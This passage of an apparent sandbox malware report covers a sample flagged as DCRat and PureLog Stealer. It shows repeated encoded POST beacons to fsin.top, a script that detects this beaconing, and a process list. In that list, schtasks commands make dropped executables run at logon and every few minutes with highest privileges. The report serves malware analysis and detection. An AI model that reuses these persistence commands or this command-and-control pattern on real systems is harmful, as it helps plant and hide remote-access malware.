    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 62448 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:13.662651062 CET | 273 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:14.008692980 CET | 344 | OUT | Data Raw: 05 00 01 01 03 0c 01 0a 05 06 02 01 02 03 01 07 00 0b 05 0a 02 05 03 0e 00 03 0d 02 07 00 01 03 0d 05 06 5d 03 0c 04 05 0d 05 06 05 04 01 02 07 03 05 0e 0a 0c 02 06 57 01 05 04 53 06 52 07 0a 05 0b 0d 0d 06 05 06 53 0d 01 0e 55 0f 53 0b 02 04 06
    Data Ascii: ]WSRSUSTU\L}T~`y\w\mOa\|AhRb]wR`hM`KoBKlNWZCQcthNu~V@{}PO}bi
Jan 11, 2025 16:22:14.291826010 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:14.423582077 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:14 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 62449 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:16.565587997 CET | 261 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:16.915082932 CET | 344 | OUT | Data Raw: 00 00 04 05 06 00 04 07 05 06 02 01 02 06 01 07 00 06 05 08 02 01 03 0a 03 07 0f 04 05 03 02 06 0d 05 03 0d 01 03 03 0a 0d 00 05 51 04 0a 06 0e 06 01 0d 00 0e 00 05 01 04 00 07 54 04 0b 06 0e 05 03 0c 01 07 04 05 07 0b 05 0c 57 0d 0c 0c 55 05 54
    Data Ascii: QTWUT_QW\L~@~`a]wr_MbvwR~|eB`lhksw^y|dXl`XDhmxwdcZ~_~V@B{}bA~by
Jan 11, 2025 16:22:17.193934917 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:17.323491096 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:17 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 62450 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:22.646418095 CET | 261 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:22.993086100 CET | 344 | OUT | Data Raw: 05 01 04 0c 06 0f 04 01 05 06 02 01 02 07 01 0b 00 0a 05 0c 02 05 03 09 07 06 0e 04 06 0e 01 02 0a 06 06 5b 03 54 04 50 0e 50 04 00 04 01 07 00 07 04 0e 0a 0f 54 07 01 04 05 04 06 06 01 07 0e 03 00 0f 0c 04 04 01 03 0e 55 0f 04 0d 53 0c 01 04 0c
    Data Ascii: [TPPTUSU\L}SpbMwrT\bf|O|zXtRw\ksQYxocElYaXCZAvd|AiO~V@Az}\}bu
Jan 11, 2025 16:22:23.293390989 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:23.427356958 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:23 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 62451 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:25.001554012 CET | 309 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:25.352543116 CET | 344 | OUT | Data Raw: 00 02 01 06 06 0f 01 07 05 06 02 01 02 01 01 02 00 07 05 0f 02 0c 03 0d 03 0e 0a 04 04 0f 06 03 0f 51 04 0a 02 0d 07 0a 0d 07 02 02 07 07 05 04 04 04 0c 01 0d 0f 01 02 06 01 07 54 01 02 00 09 05 04 0f 00 00 04 04 54 0e 00 0e 01 0d 56 0f 06 06 00
    Data Ascii: QTTVP[RW\L}SkYzcrT_a[ZA||r]w|Zh]xKxU{zcz}nhto]}u~V@xmfre
Jan 11, 2025 16:22:25.657941103 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:25.793163061 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:25 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 62452 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:27.837985039 CET | 326 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:28.196190119 CET | 344 | OUT | Data Raw: 00 01 01 07 06 01 04 05 05 06 02 01 02 0c 01 06 00 02 05 0b 02 03 03 01 02 06 0e 02 04 52 00 00 0d 04 05 0e 01 07 04 50 0e 01 04 05 05 54 02 05 06 01 0e 0e 0a 07 05 01 07 04 06 50 05 05 04 0b 02 05 0e 0c 05 0f 04 52 0f 57 0c 02 0d 56 0e 09 07 07
    Data Ascii: RPTPRWVW\L~hcjc[mOwvoQkRqB`R_~spIyoo{syY|C`tY{[}u~V@{mrL~L[
Jan 11, 2025 16:22:28.494632959 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:28.629147053 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:28 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 62453 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:30.266645908 CET | 309 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:30.618149042 CET | 344 | OUT | Data Raw: 05 00 01 06 03 0b 04 00 05 06 02 01 02 04 01 0b 00 07 05 0f 02 07 03 0c 00 02 0d 07 04 50 01 57 0a 01 03 0d 02 56 06 07 0e 06 04 06 05 56 04 04 06 53 0b 0b 0a 03 04 0a 04 02 07 54 06 05 05 0f 01 02 0f 5d 00 02 05 06 0e 0e 0c 0f 0d 03 0c 02 07 03
    Data Ascii: PWVVST]]WWVW\L~hjwqn]wewP|aB`c_~p|K{olXopPmlCwg{\ie~V@@z}f}La
Jan 11, 2025 16:22:30.921850920 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:31.033463955 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:30 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
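The eight sessions above share one traffic shape: repeated POSTs from the same client to the same URI on fsin.top, a body that is always 344 bytes, a User-Agent that changes between connections, and a server that answers 404 while the client keeps polling every few seconds. The following script is an added example and not part of the Joe Sandbox report or of the sample; it scores HTTP request records for exactly these traits. The log line format, the minimum request count and the interval threshold are assumptions made here, and the sample lines are constructed from the values visible in sessions 8 to 15 plus two benign control lines.

```python
"""
Beacon-pattern check over HTTP request records.

Added example for this report, not code from Joe Sandbox or from the sample.
It flags the traffic shape seen in sessions 8 to 15: repeated POSTs from one
client to one URI, a constant body size, a rotating User-Agent and a client
that keeps polling through HTTP 404. The log line format and the thresholds
are assumptions; the sample lines are constructed from the page's values.
"""
from __future__ import annotations

import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: ts src dst method host uri content_length status "ua".
# Lines 1-8 mirror sessions 8-15 on the page; the last two are benign controls.
SAMPLE_LOG = """\
2025-01-11T16:21:37.741867 192.168.2.4:62410 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
2025-01-11T16:22:04.872351 192.168.2.4:62447 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
2025-01-11T16:22:13.662651 192.168.2.4:62448 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
2025-01-11T16:22:16.565587 192.168.2.4:62449 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
2025-01-11T16:22:22.646418 192.168.2.4:62450 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
2025-01-11T16:22:25.001554 192.168.2.4:62451 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36"
2025-01-11T16:22:27.837985 192.168.2.4:62452 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60"
2025-01-11T16:22:30.266645 192.168.2.4:62453 37.44.238.250:80 POST fsin.top /javascriptCentraldownloads.php 344 404 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
2025-01-11T16:25:00.000000 192.168.2.4:62460 203.0.113.10:80 GET www.example.com /index.html 0 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
2025-01-11T16:25:01.000000 192.168.2.4:62461 203.0.113.10:80 GET www.example.com /logo.png 0 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<host>\S+) '
    r'(?P<uri>\S+) (?P<clen>\d+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def parse_log(text: str) -> list[dict]:
    """Parse the constructed line format; malformed lines are skipped, not fatal."""
    reqs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        r = m.groupdict()
        r["ts"] = datetime.fromisoformat(r["ts"])
        r["clen"] = int(r["clen"])
        r["status"] = int(r["status"])
        reqs.append(r)
    return reqs


def find_beacons(reqs: list[dict], min_requests: int = 5,
                 max_median_gap_s: float = 60.0) -> list[dict]:
    """Group requests by (client IP, server, method, host, URI) and score each group.

    A group is reported when it has at least min_requests requests, a median
    inter-request gap below max_median_gap_s, and at least two of: a constant
    non-empty body size, more than one User-Agent from the same client, and
    only 404 answers from the server.
    """
    groups: dict[tuple, list[dict]] = defaultdict(list)
    for r in reqs:
        client_ip = r["src"].rsplit(":", 1)[0]  # drop the ephemeral source port
        groups[(client_ip, r["dst"], r["method"], r["host"], r["uri"])].append(r)

    findings = []
    for (client_ip, dst, method, host, uri), rs in groups.items():
        if len(rs) < min_requests:
            continue
        rs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rs, rs[1:])]
        median_gap = statistics.median(gaps)
        if median_gap > max_median_gap_s:
            continue
        body_sizes = {r["clen"] for r in rs}
        uas = {r["ua"] for r in rs}
        statuses = {r["status"] for r in rs}
        traits = []
        if len(body_sizes) == 1 and rs[0]["clen"] > 0:
            traits.append(f"fixed body size {rs[0]['clen']}")
        if len(uas) > 1:
            traits.append(f"{len(uas)} distinct User-Agents from one client")
        if statuses == {404}:
            traits.append("client kept polling through HTTP 404")
        if len(traits) < 2:
            continue
        findings.append({
            "client": client_ip, "dst": dst, "method": method, "host": host,
            "uri": uri, "requests": len(rs), "median_gap_s": round(median_gap, 3),
            "body_size": rs[0]["clen"] if len(body_sizes) == 1 else None,
            "distinct_user_agents": len(uas), "traits": traits,
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{f['client']} -> {f['host']}{f['uri']} ({f['dst']}): "
              f"{f['requests']} requests, median gap {f['median_gap_s']}s; "
              + "; ".join(f["traits"]))
```

Two points worth keeping in mind when reusing this against real proxy logs. A 404 from the server does not mean the infrastructure is dead: here the client kept posting a full 344-byte body on a 2 to 9 second cadence regardless of the answer, so the client behaviour, not the response code, is the indicator. And the User-Agent rotation is only suspicious in combination with the process context; the report attributes this traffic to WinPerfcommon.exe, which is not a browser, so a per-process check of the originating image adds far more confidence than the string itself.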


Target ID: 0
Start time: 10:19:57
Start date: 11/01/2025
Path: C:\Users\user\Desktop\WinPerfcommon.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\WinPerfcommon.exe"
Imagebase: 0x300000
File size: 2'020'864 bytes
MD5 hash: 6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 10:20:00
Start date: 11/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
Imagebase: 0x7ff6e97b0000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 10:20:00
Start date: 11/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"
                                                                                    Imagebase:0x7ff793e80000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 11 /tr "'C:\Recovery\SystemSettings.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SgrmBroker.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:10:20:01
